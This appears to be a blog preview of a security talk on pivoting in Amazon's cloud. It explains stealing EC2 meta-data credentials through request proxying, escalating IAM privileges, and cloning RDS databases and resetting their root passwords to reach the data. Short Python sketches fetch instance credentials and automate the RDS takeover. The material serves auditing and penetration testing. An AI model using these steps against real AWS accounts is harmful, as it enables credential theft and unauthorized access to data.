The „cloud“ infrastructure has become a crucial part of information technology. Many companies take advantage of outsourced computing and storage resources. Because many vendors offer a multitude of services, the term „cloud“ is often ill-defined and misunderstood. This is a problem if your IT security staff needs to inspect and configure your „cloud“ deployment with regard to security. Of course, virtualisation technology can be hardened, too. However, the „cloud“ infrastructure brings its own features into the game. This is where things get interesting and where you have to broaden your horizon. In his talk Pivoting In Amazon Clouds, Andres Riancho will show you what pitfalls you can expect when deploying code and data in the Amazon Cloud.
Classical security tests won’t be enough. The Amazon Elastic Compute Cloud (EC2) is more than just virtual iron. You also have to think about instance life cycles (remember that virtual systems are very volatile), (user) data, AWS Identity and Access Management (IAM) roles, and more “meta stuff” attached to your AWS infrastructure. What else is there? Let’s give you some in-depth information from Andres’ talk.
EC2 Instance Meta-Data
All EC2 instances have meta-data, such as the Amazon Machine Image (AMI) used, the kernel, and the region. This meta-data is made available to the instance through a web server (accessible only to that particular instance) which lives at http://169.254.169.254/. Amazon’s meta-data documentation explains all the details about the instance meta-data and how to access it. From the information security perspective, the important information available in the meta-data is:
- local IP address
- user data
- instance profile (AWS API credentials as explained later)
- Amazon Machine Image (AMI)
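The retrieval logic can be sketched in a few lines of Python. The fetch function is injectable so the logic can be exercised off-instance; on a real EC2 instance the default urllib-based fetcher would talk to the link-local endpoint. The paths shown (`local-ipv4`, `ami-id`) follow Amazon’s documented meta-data layout.

```python
# Sketch: reading EC2 instance meta-data from the link-local web server.
from urllib.request import urlopen

METADATA_BASE = "http://169.254.169.254/latest/meta-data/"

def default_fetch(url):
    # Only works from inside an EC2 instance; the endpoint is link-local.
    with urlopen(url, timeout=2) as resp:
        return resp.read().decode()

def get_metadata(path, fetch=default_fetch):
    """Return the meta-data value stored under `path`, e.g. 'local-ipv4'."""
    return fetch(METADATA_BASE + path)
```

On an instance, `get_metadata("local-ipv4")` or `get_metadata("ami-id")` would return the corresponding values.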
When creating a new EC2 instance, or defining a launch configuration to be used together with auto scaling groups, the AWS administrator can provide a script which will be run by the EC2 instance’s operating system as one of the last boot steps. This script, also called user data, is stored by AWS in the instance meta-data and retrieved by the OS during boot. In Ubuntu the cloud-init daemon is responsible for retrieving and running this script.
User data scripts are a common way to configure EC2 instances: they install base packages such as a git client, define variables (for source repositories, etc.), download and compile application source code, and start required daemon processes. Since in most cases the repository holding the instance’s application source code is private, SSH keys are used to access it. GitHub, BitBucket and other widely used source repositories call these “Deploy SSH Keys”. The SSH keys used to access the repository are usually hard-coded into the user data script, or stored in an alternate location from which the script can download them.
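What an attacker (or auditor) looks for in a leaked user data script can be sketched as a simple scan for embedded private keys and repository URLs. The sample script and repository name below are entirely hypothetical:

```python
# Sketch: spotting hard-coded deploy keys and repo URLs in a user data script.
import re

# A hypothetical user data script of the kind described above.
SAMPLE_USER_DATA = """#!/bin/bash
apt-get install -y git
cat > /root/.ssh/id_rsa <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
(hypothetical deploy key material)
-----END RSA PRIVATE KEY-----
EOF
git clone git@github.com:example/private-app.git /srv/app
"""

def find_secrets(user_data):
    """Return embedded private key markers and git-over-SSH repository URLs."""
    keys = re.findall(r"-----BEGIN [A-Z ]*PRIVATE KEY-----", user_data)
    repos = re.findall(r"git@[\w.\-]+:[\w.\-/]+\.git", user_data)
    return keys, repos
```

Running `find_secrets(SAMPLE_USER_DATA)` would flag both the deploy key and the private repository URL.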
This becomes a risk when a vulnerability allows an attacker to proxy HTTP GET requests through the EC2 instance, because he can then retrieve the user data script from the meta-data. In other words, if an attacker can get any of the services running on the instance to perform an HTTP GET request to an arbitrary URL and return the HTTP response body, he gains access to the repository URL, branch and SSH keys, allowing him to access the application source. The most common vulnerability that allows this type of access is a PHP Remote File Include, but any other vulnerable software which allows HTTP proxying could be used to retrieve the meta-data too.
It is common practice for applications running on EC2 instances to access AWS services like SQS or S3. In order for this to work, the application needs access to AWS credentials. There are various ways to achieve this, but Amazon recommends using instance profiles.
Instance profiles are created by the AWS architect, who decides which permissions will be available to the EC2 instances using the profile. For example, it is possible to create an instance profile with “SQS:*” permissions, which would allow access to all API calls in the SQS service.
Once created, the instance profile is associated with an EC2 instance or a launch configuration. When the instances are started, AWS creates a unique set of credentials (an access key, a secret key, and a security token) and makes them available to the instance through its meta-data. Most libraries which consume AWS services, such as boto, know how to retrieve these credentials from the meta-data and use them to access the AWS services.
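The credential retrieval follows the same meta-data mechanism as before: list the roles under the documented `iam/security-credentials/` path, then fetch and parse the JSON credential document for a role. A minimal sketch (the fetch function is injectable so it can run off-instance; the field names follow Amazon’s documented format):

```python
# Sketch: retrieving instance-profile credentials from the meta-data.
import json

CREDS_PATH = ("http://169.254.169.254/latest/meta-data/"
              "iam/security-credentials/")

def get_role_credentials(fetch):
    """Fetch and parse the credentials of the first available role."""
    role = fetch(CREDS_PATH).splitlines()[0]
    doc = json.loads(fetch(CREDS_PATH + role))
    return {
        "access_key": doc["AccessKeyId"],
        "secret_key": doc["SecretAccessKey"],
        "token": doc["Token"],
    }
```

This is essentially what libraries like boto do automatically behind the scenes.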
Since the instance profile credentials are stored in the meta-data, they suffer from the same risks as any other information stored there. Once those credentials are retrieved from the instance, they can be used from any other system with Internet access. The permissions available to an attacker using the stolen credentials are the same as those of the EC2 instance, which makes it very important for the AWS administrator to apply the least privilege principle to all AWS permissions. It is also possible to enumerate the available permissions using the nimbostratus tool introduced by Andres.
IAM:* Privilege Escalation
Amazon’s IAM service is used to manage users, groups, roles and permissions. The permissions assigned to a group or user are fine-grained; they are usually created using Amazon’s IAM policy generator and then set using Amazon’s IAM service. An AWS architect can create a custom permission set which would allow access to the different AWS services such as SQS, RDS, EC2 and IAM itself.
If the AWS architect does not take special care when assigning IAM permissions, a user could use IAM API calls to elevate his own privileges. Take a look at this example:
- AWS user Alice only has privileges to access IAM API calls, IAM:* for short
- Alice uses those privileges to create a new user: Bob
- Alice creates a new role with permissions to access all AWS services
- Alice assigns the newly created role to Bob
- Alice creates access keys for the user Bob
- Alice accesses any AWS service using Bob’s user
To run this attack Alice requires at least these IAM permissions:
- iam:CreateUser
- iam:PutUserPolicy
- iam:CreateAccessKey
Note that it would also be possible to achieve the same goal using other calls to the IAM service: for example, one could create a group, assign the policy to that group, and then make the newly created user part of the group, or even make Alice herself part of the new high-privilege group.
Using AWS to access Virtualized Database Information
One of the most popular services provided by Amazon is RDS, which provides managed SQL databases. RDS reduces the management required by database servers and makes scaling and high availability easy to achieve.
SQL databases started from RDS can be managed using two very distinct methods:
- SQL database root user, connecting to the SQL server port (e.g. 3306 for MySQL)
- Amazon’s RDS API, sending HTTPS requests to the RDS API endpoint
Each method allows the user to perform different actions on the database, its data and its users. Now imagine the following situation:
- An intruder got access to a set of AWS credentials.
- The credentials have permissions to access RDS:*.
- The intruder has no other knowledge nor access to the SQL DB running on RDS.
Any knowledgeable intruder will identify three API calls which could be used to access the information stored in SQL databases managed by RDS: CreateDBSnapshot, RestoreDBInstanceFromDBSnapshot and ModifyDBInstance. The steps are trivial:
- Use CreateDBSnapshot to create a backup of the RDS instance we want to get access to.
- Use RestoreDBInstanceFromDBSnapshot to create a new RDS instance with all the information from the original one.
- When the instance is running we still won’t be able to access it using the SQL server port, since we don’t have valid credentials. To solve that we call ModifyDBInstance, which changes the “root” user’s password.
- Using a SQL client (e.g. mysql-client on Ubuntu) the intruder can connect to the DB using the “root” user and the password set in ModifyDBInstance.
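The first three steps above can be sketched against a boto3-style RDS client (the method names follow boto3’s RDS API; the client is passed in so a stub can replace a real AWS connection, and waiting for the snapshot and the new instance to become available is omitted). The instance identifiers are hypothetical:

```python
# Sketch: snapshot, restore, and password-reset sequence against RDS.

def clone_and_take_over(rds, source_instance, new_password):
    snap = source_instance + "-copy"
    clone = source_instance + "-clone"
    # 1. Snapshot the target instance.
    rds.create_db_snapshot(DBSnapshotIdentifier=snap,
                           DBInstanceIdentifier=source_instance)
    # 2. Restore the snapshot into a new instance the intruder controls.
    rds.restore_db_instance_from_db_snapshot(DBInstanceIdentifier=clone,
                                             DBSnapshotIdentifier=snap)
    # 3. Reset the master password on the clone (not the original instance).
    rds.modify_db_instance(DBInstanceIdentifier=clone,
                           MasterUserPassword=new_password,
                           ApplyImmediately=True)
    return clone
```

After this, the intruder connects to the clone’s SQL port with the new password, leaving the original instance untouched.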
Please note that an intruder could also call ModifyDBInstance on an existing RDS instance to change the “root” password. This would grant him “root” access to the SQL server, but it could also be highly destructive and cause a denial of service if the application uses the root user to access the SQL database.
Andres Riancho will present tools created during his research. These tools help with the enumeration and exploitation of AWS misconfigurations (which is just another way of saying audit).
Who should attend?
Anyone seriously working with or considering Amazon Web Services (or any other kind of „Cloud“ infrastructure) should attend this talk! The „Cloud“ is more than just virtualisation. You have to deal with the additional APIs and details it brings with it. The concepts discussed in this presentation are especially important for penetration testers and auditors who attack or investigate „Cloud“ infrastructure.